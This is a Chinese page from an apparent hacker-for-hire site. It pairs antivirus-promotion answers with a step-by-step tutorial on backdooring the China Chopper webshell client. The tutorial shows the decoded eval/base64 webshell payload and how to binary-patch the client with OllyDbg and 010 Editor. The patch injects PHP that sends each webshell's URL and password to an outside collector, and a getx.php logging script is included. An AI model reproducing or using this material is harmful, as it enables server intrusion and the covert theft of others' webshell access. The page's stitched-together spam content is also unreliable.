黑客24小时在线接单网站

联系黑客,怎么找黑客,24小时在线黑客,黑客在线QQ,找黑客

如何在菜刀里添加木马病毒(电脑如何植入木马病毒)

本文目录一览:

这种一句话木马在菜刀里如何使用?

您好:

建议您不要使用一句话木马,一句话木马会对您的电脑造成损害的,如果您曾使用过此类不安全的一句话木马的话,为了您电脑的安全,建议您使用腾讯电脑管家对您的电脑进行一下全面的杀毒吧,打开腾讯电脑管家中的杀毒功能选择闪电查杀或者全盘查杀就可以,您可以点击这里下载最新版的腾讯电脑管家:最新版腾讯电脑管家下载

腾讯电脑管家企业平台:

怎么弄木马病毒?

希望我的回答可以帮助楼主解决问题哦我在这里十分不想给楼主泼凉水啊

我还是建议楼主不要轻易尝试木马的任何操作,这样不仅仅危害他人电脑,还会给自己的电脑同样带来病毒以及木马的危害可能,如果你曾经这样操作过的话还是先查杀病毒为妥,下面的方法给楼主参考

1.下载腾讯电脑管家-对电脑进行安全体检,并且打开所有防火墙避免系统其余文件的感染,防止病毒再次侵入,它是防御病毒的第一道防线,尤其重要

2.打开电脑管家-杀毒-闪电查杀/全盘查杀,记得在杀毒时要打开小红伞引擎。

3.为了更加安全,同样可以对电脑进行顽固木马的清理,方法很简单,打开电脑管家-工具箱-安全-顽固木马克星来进行顽固木马程序的清理

4.同时我也建议楼主哦,如果电脑存在系统高危漏洞时,电脑本身不安全是很容易感染病毒和木马的,建议用电脑管家来经常进行系统漏洞的修复,方法为打开电脑管家-修复漏洞-一键修复

5.最好在杀毒或是清理过木马以后尽量重启电脑,确保清除多余系统缓存文件,避免重复感染的问题产生。

6.平时也不要接陌生人发的文件和图片,里面很有可能加的木马病毒,对于危险网站建议也不要进入,里面也是有木马的。

以上我的回答供楼主参考解决问题,望采纳。

如何给中国菜刀添加隐蔽后门

1、后门如何触发

这里要先讲下菜刀的后门是如何触发的,知道如何触发后门,后面按这个思路往下看会方便些。

当一句话连回目标服务器时,我们经常会在文件列表中右键查看文件,如下图

当我们执行右键-编辑文件时,我们的后门就会被触发(我们要添加的就是这样的一个隐藏后门)。

2、菜刀脱壳

在分析菜刀前,先把菜刀的壳脱掉,使用Peid可知,菜刀是UPx壳,网上找个Upx的脱壳工具即可脱壳。

3、查看数据包,分析流程(右键-编辑)

本地搭建好环境后,在菜刀中右键-编辑查看某一文件,使用burpsuite进行抓包,

数据如下

a=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3Bz0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3Dz1=QzpcXHdhbXBcXHd3d1xccm9ib3RzLnR4dA%3D%3D

一共有3个参数,

a url解码后为@eval (base64_decode($_POST[z0]));

z0先url解码,在base64解码为

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("-|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|-");die();

Z1先url解码,在base64解码为

C:\\wamp\\www\\robots.txt

稍微熟悉php的人应该能看出来,这段代码就是一个读文件的php脚本,由菜刀发送到目标服务器上,然后在目标服务器上执行的。 既然代码作为字符串发送带目标服务器上,那我我们可以再字符串上添加我们想执行的代码,由菜刀一起发送过去执行。

if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents(''.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}

如果我们将上这段代码作为字符串,发送到服务端执行,我们就能获得webshell的地址和密码。

4、使用OD分析

使用OD打开中国菜刀,右键搜索字符串,结果如下:

定位到php读取文的字符串处,点击进去到代码处

可知,程序时将其作为字符串,压入栈中作为参数被后续函数处理的,如果在这段字符串后加入我们的后门代码,就会被程序一块发送到服务端执行。

5、修改菜刀程序文件

由上可知,字符串的地址为0x49ba94,查看内存数据,

发现其后面已经被他字符串占用(直接查看原二进制文件结果也是如此),如果我们强制在后面添加后门字符串,就会破坏远程的某些内容。因此我们需要另外找一个空闲的大空间,将后门代码放在此处。

这里我们选取地址4841d0h的空间,转化为文件偏移即为841d0h。

将后门字符串

$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents(''.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}

放到文件841d0处

打开010editor 将上述字符串复制到010editor中,

由于程序中的字符串是双字节存放的,这里我们需要将后门代码也转化为双字节的。010ditor-工具-转换

使用010editor打开菜刀程序,跳到841d0h偏移处,将转换后的字符串覆盖替换菜刀程序中相同大小的数据长度,

保存文件,这样后门字符串就被我们添加到程序中了。

6、使用OD修改程序代码

用OD打开菜刀程序,定位到第4步中字符串入栈的代码处 push 0049bae4。

0049bae4地址是修改前字符串的位置,现在我们将其改成我们添加的字符串的地质处,字符串文件偏移为841d0h,转化内存偏移为4841d0h,代码修改如下

保存修改的文件即可。

7、测试修改结果

修改文件后,我们在看看菜刀-右键编辑,抓到数据包

Z0解密后为

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("-|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents(''.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));};echo("|-");die();

可见我们的后门代码也一起被发送到服务端执行了。

编写加单的getx.php接收结果,

getx.php:

?php

$getx = $_GET["caidao"];

$file = fopen("getx.txt","a+");

fwrite($file,$getx);

fwrite($file,"\r\n");

fclose($file);

?

结果如下:

8、后记

通过测试可知,对于asp,aspx跟php后门的添加相似,都可以实现。Jsp木马形式不一,实现添加后门较为困难。另外,由于后门是在服务端执行的,所以不容易被发现,本地抓包是检测不到后门的;OD中右键查看后门地址也是不能直接看到的。

  • 评论列表:
  •  黑客技术
     发布于 2022-07-04 21:13:16  回复该评论
  • t_time_limit(0);@set_magic_quotes_runtime(0);echo("-|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);
  •  黑客技术
     发布于 2022-07-04 12:48:32  回复该评论
  • x);fwrite($file,"\r\n");fclose($file);?结果如下:8、后记通过测试可知,对于asp,aspx跟php后门的添加相似,都可以实现。Jsp木马形式不一,实现添加后门较为困难。另外,由于后门是在服务端执行的,所以不容易被发现,本地抓包是检测不到
  •  黑客技术
     发布于 2022-07-04 16:18:21  回复该评论
  • 发送带目标服务器上,那我我们可以再字符串上添加我们想执行的代码,由菜刀一起发送过去执行。if(@$_COOKIE['f1']!=95){@setcookie('f1',95);
  •  黑客技术
     发布于 2022-07-04 22:26:45  回复该评论
  • 为0x49ba94,查看内存数据,发现其后面已经被他字符串占用(直接查看原二进制文件结果也是如此),如果我们强制在后面添加后门字符串,就会破坏远程的某些内容。因此我们需要另外找一个空闲的大空间,将后门代码放在此处

发表评论:

Powered By

Copyright Your WebSite.Some Rights Reserved.